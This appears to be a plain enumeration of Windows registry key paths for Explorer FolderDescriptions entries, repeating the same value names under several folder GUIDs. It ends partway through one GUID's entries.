HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{E555AB60-153B-4D17-9F04-A5FE99FC15EC}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{E555AB60-153B-4D17-9F04-A5FE99FC15EC}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{E555AB60-153B-4D17-9F04-A5FE99FC15EC}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{E555AB60-153B-4D17-9F04-A5FE99FC15EC}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{E555AB60-153B-4D17-9F04-A5FE99FC15EC}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{E555AB60-153B-4D17-9F04-A5FE99FC15EC}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{E555AB60-153B-4D17-9F04-A5FE99FC15EC}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{E555AB60-153B-4D17-9F04-A5FE99FC15EC}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{E555AB60-153B-4D17-9F04-A5FE99FC15EC}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{E555AB60-153B-4D17-9F04-A5FE99FC15EC}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{E555AB60-153B-4D17-9F04-A5FE99FC15EC}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{E555AB60-153B-4D17-9F04-A5FE99FC15EC}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{E555AB60-153B-4D17-9F04-A5FE99FC15EC}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{E555AB60-153B-4D17-9F04-A5FE99FC15EC}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{E555AB60-153B-4D17-9F04-A5FE99FC15EC}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{054FAE61-4DD8-4787-80B6-090220C4B700}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{054FAE61-4DD8-4787-80B6-090220C4B700}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{054FAE61-4DD8-4787-80B6-090220C4B700}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{054FAE61-4DD8-4787-80B6-090220C4B700}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{054FAE61-4DD8-4787-80B6-090220C4B700}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{054FAE61-4DD8-4787-80B6-090220C4B700}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{054FAE61-4DD8-4787-80B6-090220C4B700}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{054FAE61-4DD8-4787-80B6-090220C4B700}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{054FAE61-4DD8-4787-80B6-090220C4B700}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{054FAE61-4DD8-4787-80B6-090220C4B700}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{054FAE61-4DD8-4787-80B6-090220C4B700}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{054FAE61-4DD8-4787-80B6-090220C4B700}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{054FAE61-4DD8-4787-80B6-090220C4B700}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{054FAE61-4DD8-4787-80B6-090220C4B700}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{054FAE61-4DD8-4787-80B6-090220C4B700}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{054FAE61-4DD8-4787-80B6-090220C4B700}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{054FAE61-4DD8-4787-80B6-090220C4B700}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{054FAE61-4DD8-4787-80B6-090220C4B700}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{054FAE61-4DD8-4787-80B6-090220C4B700}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{054FAE61-4DD8-4787-80B6-090220C4B700}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{054FAE61-4DD8-4787-80B6-090220C4B700}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{054FAE61-4DD8-4787-80B6-090220C4B700}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B250C668-F57D-4EE1-A63C-290EE7D1AA1F}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B250C668-F57D-4EE1-A63C-290EE7D1AA1F}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B250C668-F57D-4EE1-A63C-290EE7D1AA1F}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B250C668-F57D-4EE1-A63C-290EE7D1AA1F}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B250C668-F57D-4EE1-A63C-290EE7D1AA1F}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B250C668-F57D-4EE1-A63C-290EE7D1AA1F}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B250C668-F57D-4EE1-A63C-290EE7D1AA1F}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B250C668-F57D-4EE1-A63C-290EE7D1AA1F}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B250C668-F57D-4EE1-A63C-290EE7D1AA1F}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B250C668-F57D-4EE1-A63C-290EE7D1AA1F}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B250C668-F57D-4EE1-A63C-290EE7D1AA1F}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B250C668-F57D-4EE1-A63C-290EE7D1AA1F}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B250C668-F57D-4EE1-A63C-290EE7D1AA1F}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B250C668-F57D-4EE1-A63C-290EE7D1AA1F}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B250C668-F57D-4EE1-A63C-290EE7D1AA1F}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B250C668-F57D-4EE1-A63C-290EE7D1AA1F}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B250C668-F57D-4EE1-A63C-290EE7D1AA1F}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B250C668-F57D-4EE1-A63C-290EE7D1AA1F}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B250C668-F57D-4EE1-A63C-290EE7D1AA1F}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B250C668-F57D-4EE1-A63C-290EE7D1AA1F}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B250C668-F57D-4EE1-A63C-290EE7D1AA1F}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B250C668-F57D-4EE1-A63C-290EE7D1AA1F}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52528A6B-B9E3-4ADD-B60D-588C2DBA842D}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52528A6B-B9E3-4ADD-B60D-588C2DBA842D}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52528A6B-B9E3-4ADD-B60D-588C2DBA842D}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52528A6B-B9E3-4ADD-B60D-588C2DBA842D}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52528A6B-B9E3-4ADD-B60D-588C2DBA842D}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52528A6B-B9E3-4ADD-B60D-588C2DBA842D}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52528A6B-B9E3-4ADD-B60D-588C2DBA842D}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52528A6B-B9E3-4ADD-B60D-588C2DBA842D}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52528A6B-B9E3-4ADD-B60D-588C2DBA842D}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52528A6B-B9E3-4ADD-B60D-588C2DBA842D}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52528A6B-B9E3-4ADD-B60D-588C2DBA842D}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52528A6B-B9E3-4ADD-B60D-588C2DBA842D}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52528A6B-B9E3-4ADD-B60D-588C2DBA842D}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52528A6B-B9E3-4ADD-B60D-588C2DBA842D}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52528A6B-B9E3-4ADD-B60D-588C2DBA842D}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52528A6B-B9E3-4ADD-B60D-588C2DBA842D}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52528A6B-B9E3-4ADD-B60D-588C2DBA842D}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52528A6B-B9E3-4ADD-B60D-588C2DBA842D}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52528A6B-B9E3-4ADD-B60D-588C2DBA842D}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52528A6B-B9E3-4ADD-B60D-588C2DBA842D}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52528A6B-B9E3-4ADD-B60D-588C2DBA842D}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{52528A6B-B9E3-4ADD-B60D-588C2DBA842D}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCB5256F-79F6-4CEE-B725-DC34E402FD46}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCB5256F-79F6-4CEE-B725-DC34E402FD46}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCB5256F-79F6-4CEE-B725-DC34E402FD46}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCB5256F-79F6-4CEE-B725-DC34E402FD46}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCB5256F-79F6-4CEE-B725-DC34E402FD46}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCB5256F-79F6-4CEE-B725-DC34E402FD46}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCB5256F-79F6-4CEE-B725-DC34E402FD46}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCB5256F-79F6-4CEE-B725-DC34E402FD46}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCB5256F-79F6-4CEE-B725-DC34E402FD46}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCB5256F-79F6-4CEE-B725-DC34E402FD46}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCB5256F-79F6-4CEE-B725-DC34E402FD46}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCB5256F-79F6-4CEE-B725-DC34E402FD46}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCB5256F-79F6-4CEE-B725-DC34E402FD46}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCB5256F-79F6-4CEE-B725-DC34E402FD46}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCB5256F-79F6-4CEE-B725-DC34E402FD46}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCB5256F-79F6-4CEE-B725-DC34E402FD46}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCB5256F-79F6-4CEE-B725-DC34E402FD46}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCB5256F-79F6-4CEE-B725-DC34E402FD46}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCB5256F-79F6-4CEE-B725-DC34E402FD46}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCB5256F-79F6-4CEE-B725-DC34E402FD46}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCB5256F-79F6-4CEE-B725-DC34E402FD46}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCB5256F-79F6-4CEE-B725-DC34E402FD46}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{724EF170-A42D-4FEF-9F26-B60E846FBA4F}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{724EF170-A42D-4FEF-9F26-B60E846FBA4F}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{724EF170-A42D-4FEF-9F26-B60E846FBA4F}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{724EF170-A42D-4FEF-9F26-B60E846FBA4F}\ParentFolder
